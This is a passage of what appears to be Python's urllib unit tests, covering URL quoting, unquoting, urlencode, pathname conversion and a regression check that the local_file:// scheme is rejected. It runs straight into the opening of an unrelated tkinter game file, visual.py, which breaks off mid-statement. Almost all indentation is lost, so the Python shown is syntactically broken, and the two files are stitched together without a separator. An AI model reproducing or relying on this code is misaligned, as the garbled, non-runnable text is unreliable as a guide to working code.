Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
def _reporthook(par1, par2, par3):
pass
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve('http://example.com/',
reporthook=_reporthook)
finally:
self.unfakehttp()
def test_short_content_raises_ContentTooShortError_without_reporthook(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve('http://example.com/')
finally:
self.unfakehttp()
class QuotingTests(unittest.TestCase):
"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 2396 (Uniform Resource Identifiers), to escape a
character you write it as '%' + <2 character US-ASCII hex value>.
The Python code of ``'%' + hex(ord(<character>))[2:]`` escapes a
character properly. Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-"])
result = urllib.parse.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %r != %r" % (do_not_quote, result))
result = urllib.parse.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %r != %r" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.parse.quote.__defaults__[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.parse.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
result = urllib.parse.quote_plus(quote_by_default,
safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %r != %r" %
(quote_by_default, result))
# Safe expressed as bytes rather than str
result = urllib.parse.quote(quote_by_default, safe=b"<>")
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
# "Safe" non-ASCII characters should have no effect
# (Since URIs are not allowed to have non-ASCII characters)
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
# Same as above, but using a bytes rather than str
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe=b"\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.parse.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): "
"%s should be escaped to %s, not %s" %
(char, hexescape(char), result))
            result = urllib.parse.quote_plus(char)
            self.assertEqual(hexescape(char), result,
                             "using quote_plus(): "
                             "%s should be escaped to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.parse.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %r != %r" % (expected, result))
result = urllib.parse.quote_plus(partial_quote)
self.assertEqual(expected, result,
"using quote_plus(): %r != %r" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.parse.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %r != %r" % (result, hexescape(' ')))
result = urllib.parse.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %r != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.parse.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
# Test with bytes
self.assertEqual(urllib.parse.quote_plus(b'alpha+beta gamma'),
'alpha%2Bbeta+gamma')
# Test with safe bytes
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', b'+'),
'alpha+beta+gamma')
def test_quote_bytes(self):
# Bytes should quote directly to percent-encoded values
given = b"\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Encoding argument should raise type error on bytes input
self.assertRaises(TypeError, urllib.parse.quote, given,
encoding="latin-1")
# quote_from_bytes should work the same
result = urllib.parse.quote_from_bytes(given)
self.assertEqual(expect, result,
"using quote_from_bytes(): %r != %r"
% (expect, result))
def test_quote_with_unicode(self):
# Characters in Latin-1 range, encoded by default in UTF-8
given = "\xa2\xd8ab\xff"
expect = "%C2%A2%C3%98ab%C3%BF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
        # Characters in Latin-1 range, encoded with None (default)
result = urllib.parse.quote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded with Latin-1
given = "\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded by default in UTF-8
given = "\u6f22\u5b57" # "Kanji"
expect = "%E6%BC%A2%E5%AD%97"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with Latin-1
given = "\u6f22\u5b57"
self.assertRaises(UnicodeEncodeError, urllib.parse.quote, given,
encoding="latin-1")
# Characters in BMP, encoded with Latin-1, with replace error handling
given = "\u6f22\u5b57"
expect = "%3F%3F" # "??"
result = urllib.parse.quote(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, Latin-1, with xmlcharref error handling
given = "\u6f22\u5b57"
expect = "%26%2328450%3B%26%2323383%3B" # "漢字"
result = urllib.parse.quote(given, encoding="latin-1",
errors="xmlcharrefreplace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
def test_quote_plus_with_unicode(self):
# Encoding (latin-1) test for quote_plus
given = "\xa2\xd8 \xff"
expect = "%A2%D8+%FF"
result = urllib.parse.quote_plus(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
# Errors test for quote_plus
given = "ab\u6f22\u5b57 cd"
expect = "ab%3F%3F+cd"
result = urllib.parse.quote_plus(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
    See the docstring for QuotingTests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.parse.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, ())
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, b'')
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
# unquote_to_bytes
given = '%xab'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%x'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, ())
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits in the percent-escapes
given = '%Ab%eA'
expect = b'\xab\xea'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquote_to_bytes(self):
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = b'br\xc3\xbcckner_sapporo_20050930.doc'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test on a string with unescaped non-ASCII characters
# (Technically an invalid URI; expect those characters to be UTF-8
# encoded).
result = urllib.parse.unquote_to_bytes("\u6f22%C3%BC")
expect = b'\xe6\xbc\xa2\xc3\xbc' # UTF-8 for "\u6f22\u00fc"
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input
given = b'%A2%D8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input, with unescaped non-ASCII bytes
# (Technically an invalid URI; expect those bytes to be preserved)
given = b'%A2\xd8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquote_with_unicode(self):
# Characters in the Latin-1 range, encoded with UTF-8
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = 'br\u00fcckner_sapporo_20050930.doc'
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with None (default)
result = urllib.parse.unquote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with Latin-1
result = urllib.parse.unquote('br%FCckner_sapporo_20050930.doc',
encoding="latin-1")
expect = 'br\u00fcckner_sapporo_20050930.doc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with UTF-8
given = "%E6%BC%A2%E5%AD%97"
expect = "\u6f22\u5b57" # "Kanji"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence
given = "%F3%B1"
expect = "\ufffd" # Replacement character
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, replace errors
result = urllib.parse.unquote(given, errors="replace")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, ignoring errors
given = "%F3%B1"
expect = ""
result = urllib.parse.unquote(given, errors="ignore")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, UTF-8
result = urllib.parse.unquote("\u6f22%C3%BC")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, Latin-1
# (Note, the string contains non-Latin-1-representable characters)
result = urllib.parse.unquote("\u6f22%FC", encoding="latin-1")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
Test cannot assume anything about order. Docs make no guarantee and
have possible dictionary input.
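        For instance, a dict such as {'1st': '1', '2nd': '2', '3rd': '3'} may
        encode to "1st=1&2nd=2&3rd=3" in some key order (illustrative only,
        not asserted by this helper).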
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.parse.urlencode(given)
for expected in expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.parse.quote_plus(str(['1', '2', '3']))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
def test_empty_sequence(self):
self.assertEqual("", urllib.parse.urlencode({}))
self.assertEqual("", urllib.parse.urlencode([]))
def test_nonstring_values(self):
self.assertEqual("a=1", urllib.parse.urlencode({"a": 1}))
self.assertEqual("a=None", urllib.parse.urlencode({"a": None}))
def test_nonstring_seq_values(self):
self.assertEqual("a=1&a=2", urllib.parse.urlencode({"a": [1, 2]}, True))
self.assertEqual("a=None&a=a",
urllib.parse.urlencode({"a": [None, "a"]}, True))
data = collections.OrderedDict([("a", 1), ("b", 1)])
self.assertEqual("a=a&a=b",
urllib.parse.urlencode({"a": data}, True))
def test_urlencode_encoding(self):
        # ASCII encoding. Expect %3F with errors="replace"
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Default is UTF-8 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
# Latin-1 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_encoding_doseq(self):
        # ASCII Encoding. Expect %3F with errors="replace"
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, doseq=True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# ASCII Encoding. On a sequence of values.
given = (("\u00a0", (1, "\u00c1")),)
expect = '%3F=1&%3F=%3F'
result = urllib.parse.urlencode(given, True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Utf-8
given = (("\u00a0", "\u00c1"),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%C2%A0=42&%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# latin-1
given = (("\u00a0", "\u00c1"),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%A0=42&%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_bytes(self):
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0%24=%C1%24'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# Sequence of values
given = ((b'\xa0\x24', (42, b'\xc1\x24')),)
expect = '%A0%24=42&%A0%24=%C1%24'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
def test_urlencode_encoding_safe_parameter(self):
# Send '$' (\x24) as safe character
# Default utf-8 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, doseq=True, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
# Safe parameter in sequence
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$")
self.assertEqual(expect, result)
# Test all above in latin-1 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$",
encoding="latin-1")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0$=%C1$'
result = urllib.parse.urlencode(given, doseq=True, safe=":$",
encoding="latin-1")
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$",
encoding="latin-1")
self.assertEqual(expect, result)
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.request.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
        result = urllib.request.url2pathname(expected_url)
        self.assertEqual(expected_path, result,
                         "url2pathname() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
        # Test automatic quoting and unquoting works for pathname2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.parse.quote("quot=ing")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.request.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.parse.quote("make sure")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
@unittest.skipUnless(sys.platform == 'win32',
'test specific to the urllib.url2path function.')
def test_ntpath(self):
given = ('/C:/', '///C:/', '/C|//')
expect = 'C:\\'
for url in given:
result = urllib.request.url2pathname(url)
self.assertEqual(expect, result,
                             'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
given = '///C|/path'
expect = 'C:\\path'
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
class Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions in the urllib."""
def test_thishost(self):
"""Test the urllib.request.thishost utility function returns a tuple"""
self.assertIsInstance(urllib.request.thishost(), tuple)
class URLopener_Tests(unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
class DummyURLopener(urllib.request.URLopener):
def open_spam(self, url):
return url
with support.check_warnings(
('DummyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test the safe characters are not quoted by urlopen
self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
def test_local_file_open(self):
# bpo-35907, CVE-2019-9948: urllib must reject local_file:// scheme
class DummyURLopener(urllib.request.URLopener):
def open_local_file(self, url):
return url
with warnings.catch_warnings(record=True):
warnings.simplefilter("ignore", DeprecationWarning)
for url in ('local_file://example', 'local-file://example'):
self.assertRaises(OSError, urllib.request.urlopen, url)
self.assertRaises(OSError, urllib.request.URLopener().open, url)
self.assertRaises(OSError, urllib.request.URLopener().retrieve, url)
self.assertRaises(OSError, DummyURLopener().open, url)
self.assertRaises(OSError, DummyURLopener().retrieve, url)
# Just commented them out.
# Can't really tell why they keep failing on Windows and SPARC.
# Everywhere else they work OK, but on those machines they sometimes
# fail in one of the tests, sometimes in another. I have a Linux box, and
# the tests pass there.
# If anybody has one of the problematic environments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen()
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
class RequestTests(unittest.TestCase):
"""Unit tests for urllib.request.Request."""
def test_default_values(self):
Request = urllib.request.Request
request = Request("http://www.python.org")
self.assertEqual(request.get_method(), 'GET')
request = Request("http://www.python.org", {})
self.assertEqual(request.get_method(), 'POST')
def test_with_method_arg(self):
Request = urllib.request.Request
request = Request("http://www.python.org", method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", {}, method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", method='GET')
self.assertEqual(request.get_method(), 'GET')
request.method = 'HEAD'
self.assertEqual(request.get_method(), 'HEAD')
class URL2PathNameTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(url2pathname("///C|"), 'C:')
self.assertEqual(url2pathname("///C:"), 'C:')
self.assertEqual(url2pathname("///C|/"), 'C:\\')
def test_converting_when_no_drive_letter(self):
# cannot end a raw string in \
self.assertEqual(url2pathname("///C/test/"), r'\\\C\test' '\\')
self.assertEqual(url2pathname("////C/test/"), r'\\C\test' '\\')
def test_simple_compare(self):
self.assertEqual(url2pathname("///C|/foo/bar/spam.foo"),
r'C:\foo\bar\spam.foo')
def test_non_ascii_drive_letter(self):
self.assertRaises(IOError, url2pathname, "///\u00e8|/")
def test_roundtrip_url2pathname(self):
list_of_paths = ['C:',
r'\\\C\test\\',
r'C:\foo\bar\spam.foo'
]
for path in list_of_paths:
self.assertEqual(url2pathname(pathname2url(path)), path)
class PathName2URLTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(pathname2url("C:"), '///C:')
self.assertEqual(pathname2url("C:\\"), '///C:')
def test_converting_when_no_drive_letter(self):
self.assertEqual(pathname2url(r"\\\folder\test" "\\"),
'/////folder/test/')
self.assertEqual(pathname2url(r"\\folder\test" "\\"),
'////folder/test/')
self.assertEqual(pathname2url(r"\folder\test" "\\"),
'/folder/test/')
def test_simple_compare(self):
self.assertEqual(pathname2url(r'C:\foo\bar\spam.foo'),
"///C:/foo/bar/spam.foo" )
def test_long_drive_letter(self):
self.assertRaises(IOError, pathname2url, "XX:\\")
def test_roundtrip_pathname2url(self):
list_of_paths = ['///C:',
'/////folder/test/',
'///C:/foo/bar/spam.foo']
for path in list_of_paths:
self.assertEqual(pathname2url(url2pathname(path)), path)
if __name__ == '__main__':
unittest.main()
|
visual.py
|
from threading import Condition, Thread
from time import sleep
from tkinter import Tk, Canvas, Frame, BOTH, TclError, font
from adversary import RandomAdversary
from arguments import parser
from board import Board, Direction, Rotation, Action, Shape
from constants import BOARD_HEIGHT, BOARD_WIDTH, DEFAULT_SEED, INTERVAL, \
BLOCK_LIMIT
from exceptions import BlockLimitException
from player import SelectedPlayer, Player
DRAW_INTERVAL = 100
class Visual(Frame):
board = None
canvas = None
discards = None
bombs = None
score = None
CELL_SIZE = 20
def __init__(self, board):
super().__init__()
self.board = board
self.master.geometry(
f'{(BOARD_WIDTH+6)*self.CELL_SIZE}x' +
f'{BOARD_HEIGHT*self.CELL_SIZE}'
)
self.pack(fill=BOTH, expand=1)
self.canvas = Canvas(self, bg="black")
self.canvas.pack(fill=BOTH, expand=1)
self.after(DRAW_INTERVAL, self.draw)
self.focus_set()
self.bind("<Escape>", self.quit)
self.bind("q", self.quit)
        self.bind("<Control-c>", self.quit)
GREY = '#1e1e1e'
for i in range(0,10,2):
self.canvas.create_rectangle(i * self.CELL_SIZE, 0, (i+1)*self.CELL_SIZE,
BOARD_HEIGHT * self.CELL_SIZE, fill=GREY)
try:
self.font = font.nametofont("Helvetica")
        except TclError:
self.font = font.nametofont("TkDefaultFont")
# No easy way to predict what font we'll get - it differs
# depending on the environment, so we'll just scale it until
# it's large enough. This is ugly.
size = 10
width = 0
while width < 90:
size += 1
self.font.configure(size=size)
testtxt = self.canvas.create_text(0,-100, text="DISCARDS", font = self.font)
bounds = self.canvas.bbox(testtxt)
width = bounds[2] - bounds[0]
self.canvas.delete(testtxt)
self.scorefont = font.nametofont("TkFixedFont")
size = 10
width = 0
while width < 100:
size += 1
self.scorefont.configure(size=size)
testtxt = self.canvas.create_text(0,-100, text="88888", font = self.scorefont)
bounds = self.canvas.bbox(testtxt)
width = bounds[2] - bounds[0]
self.canvas.delete(testtxt)
self.text = self.canvas.create_text((BOARD_WIDTH + 3)*self.CELL_SIZE, 0,
text="SCORE", font=self.font, anchor="n",
fill="white")
self.scoretext = self.canvas.create_text((BOARD_WIDTH + 3)*self.CELL_SIZE,
